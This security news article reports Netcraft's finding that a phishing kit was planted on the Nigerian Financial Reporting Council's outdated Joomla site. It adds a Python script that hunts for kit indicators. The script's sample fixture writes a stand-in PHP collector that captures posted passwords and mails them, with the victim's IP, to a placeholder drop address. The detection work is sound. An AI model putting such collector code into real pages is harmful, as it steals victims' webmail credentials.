The website of the Financial Reporting Council of Nigeria was used by cyber criminals in a phishing scam. According to Netcraft, the agency's legitimate website was being used to serve a webmail phishing site.
The attack is not sophisticated: the crooks used a common phishing kit that makes it easy to create customised phishing pages.
“The phishing content is based on a ready-to-go phishing kit that is distributed as a zip file. It contains easily-customisable PHP scripts and images designed to trick victims into surrendering either their Yahoo, Gmail, Hotmail or AOL passwords.” states the report.
The attackers most likely compromised the government website and dropped the phishing pages into an images directory on it. Netcraft also noted that the site runs Joomla 2.5.28, an old release of the CMS that is no longer supported.
The phishing page asks for the victim's email credentials and, for Gmail accounts, the backup phone number used for account recovery. Once the victim submits the form, the data is emailed directly to the criminals and the page redirects the browser to the Saatchi Art investment page at http://explore.saatchiart.com/invest-in-art/; Netcraft stressed that Saatchi Art is not involved in the scam.
“After a victim enters his or her email credentials into the phishing site, both the username and password are transmitted via email directly to the fraudster. These emails also contain the victim’s IP address, and a third-party web service is used to deduce which country the victim is in.” continues the post published by Netcraft.
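The kit described above leaves a recognisable footprint on the compromised host: server-side scripts where only static images should live, code that reads a posted password and the client's IP, an outbound lookup to a third-party geolocation service, a `mail()` call and a `Location:` redirect. The audit below, written for this article as an added example (it is not code from Netcraft or from the kit itself), walks a webroot for those signs. It assumes a Joomla 2.5 install whose version is recorded in `libraries/cms/version/version.php`, treats `images`, `media` and `cache` as static-asset directories, and uses indicator patterns that are generic to webmail phishing kits rather than specific to this one; the sample webroot it builds is constructed for the demonstration.

```python
"""Hunt for a webmail phishing kit dropped into a CMS static-asset directory.

Added example, not code from the Netcraft report or the kit. Assumptions:
Joomla 2.5 version file at libraries/cms/version/version.php, static-asset
directories named images/media/cache, and generic kit indicator strings.
"""
import os
import re
import tempfile
from pathlib import Path

SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar"}
STATIC_DIRS = {"images", "media", "cache"}

# Indicators of the behaviour described in the report: password capture,
# IP collection, third-party geolocation lookup, email exfiltration, redirect.
INDICATORS = {
    "captures_password": re.compile(r"\$_(POST|REQUEST)\[['\"](pass|passwd|password)['\"]\]", re.I),
    "collects_ip": re.compile(r"\$_SERVER\[['\"]REMOTE_ADDR['\"]\]"),
    "geoip_lookup": re.compile(r"(file_get_contents|curl_init)\s*\(\s*['\"]https?://[^'\"]*(geo|ip)", re.I),
    "mails_out": re.compile(r"\bmail\s*\(", re.I),
    "redirects": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
}


def scripts_under_static_dirs(webroot):
    """Return server-side scripts found beneath directories meant for static assets."""
    hits = []
    for root, _dirs, files in os.walk(webroot):
        rel_parts = Path(root).relative_to(webroot).parts
        if not any(part in STATIC_DIRS for part in rel_parts):
            continue
        for name in files:
            if Path(name).suffix.lower() in SCRIPT_EXTS:
                hits.append(os.path.join(root, name))
    return sorted(hits)


def kit_indicators(path):
    """Names of the INDICATORS patterns that match the file, sorted."""
    text = Path(path).read_text(errors="replace")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def joomla_version(webroot):
    """Parse RELEASE.DEV_LEVEL from the Joomla 2.5 version file; None if absent."""
    vfile = Path(webroot) / "libraries" / "cms" / "version" / "version.php"
    if not vfile.is_file():
        return None
    text = vfile.read_text(errors="replace")
    rel = re.search(r"\$RELEASE\s*=\s*'([\d.]+)'", text)
    dev = re.search(r"\$DEV_LEVEL\s*=\s*'(\d+)'", text)
    if not (rel and dev):
        return None
    return f"{rel.group(1)}.{dev.group(1)}"


def audit(webroot):
    """CMS version plus every suspicious script and the indicators it trips."""
    return {
        "joomla_version": joomla_version(webroot),
        "scripts": {p: kit_indicators(p) for p in scripts_under_static_dirs(webroot)},
    }


def build_sample_webroot():
    """Constructed sample tree mimicking the layout the report describes."""
    root = Path(tempfile.mkdtemp(prefix="joomla-"))
    ver = root / "libraries" / "cms" / "version"
    ver.mkdir(parents=True)
    (ver / "version.php").write_text(
        "<?php\nclass JVersion {\n public $RELEASE = '2.5';\n public $DEV_LEVEL = '28';\n}\n")
    (root / "images" / "banners").mkdir(parents=True)
    (root / "images" / "banners" / "logo.png").write_bytes(b"\x89PNG")  # benign asset
    kit = root / "images" / "webmail"
    kit.mkdir()
    # Stand-in for the kit's collector script: only the indicator lines, hypothetical hosts.
    (kit / "login.php").write_text(
        "<?php\n$u = $_POST['email'];\n$p = $_POST['passwd'];\n"
        "$ip = $_SERVER['REMOTE_ADDR'];\n"
        "$geo = file_get_contents('http://example.invalid/geoip/' . $ip);\n"
        "mail('drop@example.invalid', 'creds', \"$u|$p|$ip|$geo\");\n"
        "header('Location: http://explore.saatchiart.com/invest-in-art/');\n")
    (kit / "index.html").write_text("<form action=login.php method=post></form>")
    return str(root)


if __name__ == "__main__":
    for key, value in audit(build_sample_webroot()).items():
        print(key, value)
```

Run it against a real webroot with `audit("/var/www/html")`; any `.php` under `images/` is worth a look on its own, and a file tripping three or more indicators is almost certainly a kit. The version check matters because Joomla 2.5 stopped receiving security fixes, so an outdated `RELEASE`/`DEV_LEVEL` pair is the first thing to record in the incident notes.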
Netcraft considers this scam unusual because the attackers appear more interested in harvesting webmail credentials, which victims tend to reuse across several web services, than in the victims' bank account logins.
Netcraft reported that the majority of Nigeria’s government websites, including the one operated by the Financial Reporting Council, are hosted in the United States. They speculate the attacker exploited a flaw in the Joomla! CMS to deploy the phishing kit.
(Security Affairs – Financial Reporting Council of Nigeria, phishing, DDoS)